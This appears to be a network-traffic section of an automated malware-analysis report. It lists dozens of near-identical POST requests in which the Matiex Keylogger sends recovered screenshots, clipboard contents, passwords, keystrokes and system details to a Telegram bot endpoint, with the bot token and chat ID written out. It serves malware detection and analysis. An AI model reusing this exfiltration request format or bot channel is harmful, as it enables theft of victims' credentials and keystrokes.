Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031a37799Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031fe11b2Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680321d1006Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768032c3f656Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803301f0f4Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803363b60fHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680338c3a23Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768033b00042Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768033dfab52Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803436e938Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803458492fHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034774736Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034a958a7Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034fa6915Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035208feaHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680354451e9Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803574006eHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035c7735dHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035e8d41dHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680360ef9e8Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803639e3a2Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803696e071Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768036b84068Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768036d9a244Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680372ab0eeHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680377bc16bHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768037d195adHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768037f2f67aHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038204317Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680386ef809Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803892b5ceHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038b1b319Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038e62651Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803934d435Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680395634b8Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803975448cHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768039a2802dHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768039fd19a5Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803a1e7a3aHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803a3d78f2Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803aafe994Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803b9990bfHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803bbd536bHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803bdeb43dHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803c0e6344Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803c643a9fHost: api.telegram.orgContent-Length: 749
